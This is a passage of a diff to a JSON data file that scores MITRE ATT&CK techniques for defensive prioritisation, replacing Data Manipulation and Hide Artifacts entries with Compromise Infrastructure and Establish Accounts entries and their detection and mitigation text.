-                "description": "Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the New-InboxRule or Set-InboxRule [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)\n\nAdversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) emails sent from the compromised account.\n\nAny user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair/delay detection had the email content been immediately seen by a user or defender. Malicious rules commonly filter out emails based on key words (such as malware, suspicious, phish, and hack) found in message bodies and subject lines. (Citation: Microsoft Cloud App Security)",
-                "detection": "Monitor email clients and applications for suspicious activity, such as missing messages or abnormal configuration and/or log entries.\n\nOn Windows systems, monitor for creation of suspicious inbox rules through the use of the New-InboxRule and Set-InboxRule PowerShell cmdlets.(Citation: Microsoft BEC Campaign) On MacOS systems, monitor for modifications to the RulesActiveState.plist, SyncedRules.plist, UnsyncedRules.plist, and MessageRules.plist files.(Citation: MacOS Email Rules)",
+                "tid": "T1584.006",
+                "name": "Compromise Infrastructure: Web Services",
+                "url": "https://attack.mitre.org/techniques/T1584/006",
+                "description": "Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).(Citation: Recorded Future Turla Infra 2020) Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them.",
+                "detection": "Once adversaries leverage the abused web service as infrastructure (ex: for command and control), it may be possible to look for unique characteristics associated with adversary software, if known.(Citation: ThreatConnect Infrastructure Dec 2020)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).",
                 "mitigations": [
                     {
-                        "mid": "M1047",
-                        "name": "Audit",
-                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
-                        "url": "https://attack.mitre.org/mitigations/M1047"
+                        "mid": "M1056",
+                        "name": "Pre-compromise",
+                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1056"
                     }
                 ]
-            },
+            }
+        ],
+        "mitigations": [
+            {
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.05401915,
+        "adjusted_score": 0.05401915,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {},
+        "choke_point_score": 0.05,
+        "prevalence_score": 0.00401915
+    },
+    {
+        "tid": "T1584.001",
+        "name": "Compromise Infrastructure: Domains",
+        "description": "Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) An adversary may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.\n\nSubdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)",
+        "url": "https://attack.mitre.org/techniques/T1584/001",
+        "tactics": [
+            "Resource Development"
+        ],
+        "detection": "Consider monitoring for anomalous changes to domain registrant information and/or domain resolution information that may indicate the compromise of a domain. Efforts may need to be tailored to specific domains of interest as benign registration and resolution changes are a common occurrence on the internet.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [
+            "Domain Name: Active DNS",
+            "Domain Name: Domain Registration",
+            "Domain Name: Passive DNS"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1584",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1584.002",
+        "name": "Compromise Infrastructure: DNS Server",
+        "description": "Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.\n\nBy compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)",
+        "url": "https://attack.mitre.org/techniques/T1584/002",
+        "tactics": [
+            "Resource Development"
+        ],
+        "detection": "Consider monitoring for anomalous resolution changes for domain addresses. Efforts may need to be tailored to specific domains of interest as benign resolution changes are a common occurrence on the internet.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [
+            "Domain Name: Active DNS",
+            "Domain Name: Passive DNS"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1584",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1584.003",
+        "name": "Compromise Infrastructure: Virtual Private Server",
+        "description": "Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)\n\nCompromising a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers as well as that added by the compromised third-party.",
+        "url": "https://attack.mitre.org/techniques/T1584/003",
+        "tactics": [
+            "Resource Development"
+        ],
+        "detection": "Once adversaries have provisioned software on a compromised VPS (ex: for use as a command and control server), internet scans may reveal VPSs that adversaries have compromised. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [
+            "Internet Scan: Response Content",
+            "Internet Scan: Response Metadata"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1584",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1584.004",
+        "name": "Compromise Infrastructure: Server",
+        "description": "Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations.\n\nAdversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).",
+        "url": "https://attack.mitre.org/techniques/T1584/004",
+        "tactics": [
+            "Resource Development"
+        ],
+        "detection": "Once adversaries have provisioned software on a compromised server (ex: for use as a command and control server), internet scans may reveal servers that adversaries have compromised. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [
+            "Internet Scan: Response Content",
+            "Internet Scan: Response Metadata"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1584",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1584.005",
+        "name": "Compromise Infrastructure: Botnet",
+        "description": "Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Instead of purchasing/renting a botnet from a booter/stresser service(Citation: Imperva DDoS for Hire), adversaries may build their own botnet by compromising numerous third-party systems. Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).",
+        "url": "https://attack.mitre.org/techniques/T1584/005",
+        "tactics": [
+            "Resource Development"
+        ],
+        "detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during [Phishing](https://attack.mitre.org/techniques/T1566), [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499), or [Network Denial of Service](https://attack.mitre.org/techniques/T1498).",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [],
+        "is_subtechnique": true,
+        "supertechnique": "T1584",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
+            }
+        ],
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1584.006",
+        "name": "Compromise Infrastructure: Web Services",
+        "description": "Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).(Citation: Recorded Future Turla Infra 2020) Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them.",
+        "url": "https://attack.mitre.org/techniques/T1584/006",
+        "tactics": [
+            "Resource Development"
+        ],
+        "detection": "Once adversaries leverage the abused web service as infrastructure (ex: for command and control), it may be possible to look for unique characteristics associated with adversary software, if known.(Citation: ThreatConnect Infrastructure Dec 2020)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [
+            "Internet Scan: Response Content"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1584",
+        "subtechniques": [],
+        "mitigations": [
             {
-                "tid": "T1564.009",
-                "name": "Hide Artifacts: Resource Forking",
-                "url": "https://attack.mitre.org/techniques/T1564/009",
-                "description": "Adversaries may abuse resource forks to hide malicious code or executables to evade detection and bypass security applications. A resource fork provides applications a structured way to store resources such as thumbnail images, menu definitions, icons, dialog boxes, and code.(Citation: macOS Hierarchical File System Overview) Usage of a resource fork is identifiable when displaying a file’s extended attributes, using ls -l@ or xattr -l commands. Resource forks have been deprecated and replaced with the application bundle structure. Non-localized resources are placed at the top level directory of an application bundle, while localized resources are placed in the /Resources folder.(Citation: Resource and Data Forks)(Citation: ELC Extended Attributes)\n\nAdversaries can use resource forks to hide malicious data that may otherwise be stored directly in files. Adversaries can execute content with an attached resource fork, at a specified offset, that is moved to an executable location then invoked. Resource fork content may also be obfuscated/encrypted until execution.(Citation: sentinellabs resource named fork 2020)(Citation: tau bundlore erika noerenberg 2020)",
-                "detection": "Identify files with the com.apple.ResourceFork extended attribute and large data amounts stored in resource forks. \n\nMonitor command-line activity leveraging the use of resource forks, especially those immediately followed by potentially malicious activity such as creating network connections. ",
-                "mitigations": [
-                    {
-                        "mid": "M1013",
-                        "name": "Application Developer Guidance",
-                        "description": "This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.",
-                        "url": "https://attack.mitre.org/mitigations/M1013"
-                    }
-                ]
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
             }
         ],
-        "mitigations": [],
-        "cumulative_score": 0.8700461114285714,
-        "adjusted_score": 0.8700461114285714,
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
         "has_car": false,
-        "has_sigma": true,
-        "has_es_siem": true,
-        "has_splunk": true,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
         "cis_controls": [],
         "nist_controls": [],
-        "process_coverage": true,
+        "process_coverage": false,
         "network_coverage": false,
-        "file_coverage": true,
+        "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": true,
-        "actionability_score": {
-            "combined_score": 0.07142857142857142,
-            "detection_score": 0.15
-        },
-        "choke_point_score": 0.1,
-        "prevalence_score": 0.69861754
+        "hardware_coverage": false
     },
     {
-        "tid": "T1565",
-        "name": "Data Manipulation",
-        "description": "Adversaries may insert, delete, or manipulate data in order to manipulate external outcomes or hide activity. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.\n\nThe type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.",
-        "url": "https://attack.mitre.org/techniques/T1565",
+        "tid": "T1585",
+        "name": "Establish Accounts",
+        "description": "Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)\n\nFor operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)\n\nEstablishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1)",
+        "url": "https://attack.mitre.org/techniques/T1585",
         "tactics": [
-            "Impact"
+            "Resource Development"
         ],
-        "detection": "Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values. With some critical processes involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data.",
+        "detection": "Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).",
         "platforms": [
-            "Linux",
-            "Windows",
-            "macOS"
+            "PRE"
         ],
         "data_sources": [
-            "File: File Creation",
-            "File: File Deletion",
-            "File: File Metadata",
-            "File: File Modification",
             "Network Traffic: Network Traffic Content",
-            "Network Traffic: Network Traffic Flow",
-            "Process: OS API Execution"
+            "Persona: Social Media"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
         "subtechniques": [
             {
-                "tid": "T1565.001",
-                "name": "Data Manipulation: Stored Data Manipulation",
-                "url": "https://attack.mitre.org/techniques/T1565/001",
-                "description": "Adversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\n\nStored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.",
-                "detection": "Where applicable, inspect important file hashes, locations, and modifications for suspicious/unexpected values.",
-                "mitigations": [
-                    {
-                        "mid": "M1041",
-                        "name": "Encrypt Sensitive Information",
-                        "description": "Protect sensitive information with strong encryption.",
-                        "url": "https://attack.mitre.org/mitigations/M1041"
-                    },
-                    {
-                        "mid": "M1029",
-                        "name": "Remote Data Storage",
-                        "description": "Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.",
-                        "url": "https://attack.mitre.org/mitigations/M1029"
-                    },
-                    {
-                        "mid": "M1022",
-                        "name": "Restrict File and Directory Permissions",
-                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1022"
-                    }
-                ]
-            },
-            {
-                "tid": "T1565.002",
-                "name": "Data Manipulation: Transmitted Data Manipulation",
-                "url": "https://attack.mitre.org/techniques/T1565/002",
-                "description": "Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\n\nManipulation may be possible over a network connection or between system processes where there is an opportunity deploy a tool that will intercept and change information. The type of modification and the impact it will have depends on the target transmission mechanism as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.",
-                "detection": "Detecting the manipulation of data as at passes over a network can be difficult without the appropriate tools. In some cases integrity verification checks, such as file hashing, may be used on critical files as they transit a network. With some critical processes involving transmission of data, manual or out-of-band integrity checking may be useful for identifying manipulated data. ",
+                "tid": "T1585.001",
+                "name": "Establish Accounts: Social Media Accounts",
+                "url": "https://attack.mitre.org/techniques/T1585/001",
+                "description": "Adversaries may create and cultivate social media accounts that can be used during targeting. Adversaries can create social media accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)\n\nFor operations incorporating social engineering, the utilization of a persona on social media may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single social media site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Establishing a persona  on social media may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos. \n\nOnce a persona has been developed an adversary can use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) These accounts may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).",
+                "detection": "Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).",
                 "mitigations": [
                     {
-                        "mid": "M1041",
-                        "name": "Encrypt Sensitive Information",
-                        "description": "Protect sensitive information with strong encryption.",
-                        "url": "https://attack.mitre.org/mitigations/M1041"
+                        "mid": "M1056",
+                        "name": "Pre-compromise",
+                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1056"
                     }
                 ]
             },
             {
-                "tid": "T1565.003",
-                "name": "Data Manipulation: Runtime Data Manipulation",
-                "url": "https://attack.mitre.org/techniques/T1565/003",
-                "description": "Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.\n\nAdversaries may alter application binaries used to display data in order to cause runtime manipulations. Adversaries may also conduct [Change Default File Association](https://attack.mitre.org/techniques/T1546/001) and [Masquerading](https://attack.mitre.org/techniques/T1036) to cause a similar effect. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.",
-                "detection": "Inspect important application binary file hashes, locations, and modifications for suspicious/unexpected values.",
+                "tid": "T1585.002",
+                "name": "Establish Accounts: Email Accounts",
+                "url": "https://attack.mitre.org/techniques/T1585/002",
+                "description": "Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) Adversaries may also take steps to cultivate a persona around the email account, such as through use of [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001), to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).(Citation: Mandiant APT1)\n\nTo decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.(Citation: Trend Micro R980 2016)",
+                "detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).",
                 "mitigations": [
                     {
-                        "mid": "M1030",
-                        "name": "Network Segmentation",
-                        "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
-                        "url": "https://attack.mitre.org/mitigations/M1030"
-                    },
-                    {
-                        "mid": "M1022",
-                        "name": "Restrict File and Directory Permissions",
-                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                        "url": "https://attack.mitre.org/mitigations/M1022"
+                        "mid": "M1056",
+                        "name": "Pre-compromise",
+                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1056"
                     }
                 ]
             }
         ],
         "mitigations": [
             {
-                "mid": "M1041",
-                "name": "Encrypt Sensitive Information",
-                "description": "Protect sensitive information with strong encryption.",
-                "url": "https://attack.mitre.org/mitigations/M1041"
-            },
-            {
-                "mid": "M1030",
-                "name": "Network Segmentation",
-                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
-                "url": "https://attack.mitre.org/mitigations/M1030"
-            },
-            {
-                "mid": "M1029",
-                "name": "Remote Data Storage",
-                "description": "Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.",
-                "url": "https://attack.mitre.org/mitigations/M1029"
-            },
-            {
-                "mid": "M1022",
-                "name": "Restrict File and Directory Permissions",
-                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
-                "url": "https://attack.mitre.org/mitigations/M1022"
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
             }
         ],
-        "cumulative_score": 0.4792060285714286,
-        "adjusted_score": 0.4792060285714286,
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
         "has_car": false,
-        "has_sigma": true,
-        "has_es_siem": true,
+        "has_sigma": false,
+        "has_es_siem": false,
         "has_splunk": false,
-        "cis_controls": [
-            "3.11",
-            "3.12",
-            "3.3",
-            "4.4",
-            "6.1",
-            "6.2",
-            "6.8",
-            "11.1",
-            "11.2",
-            "11.3",
-            "11.4",
-            "11.5",
-            "12.2",
-            "12.8",
-            "16.8",
-            "3.10"
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {},
+        "choke_point_score": 0.05,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1585.001",
+        "name": "Establish Accounts: Social Media Accounts",
+        "description": "Adversaries may create and cultivate social media accounts that can be used during targeting. Adversaries can create social media accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)\n\nFor operations incorporating social engineering, the utilization of a persona on social media may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single social media site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Establishing a persona  on social media may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos. \n\nOnce a persona has been developed an adversary can use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) These accounts may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).",
+        "url": "https://attack.mitre.org/techniques/T1585/001",
+        "tactics": [
+            "Resource Development"
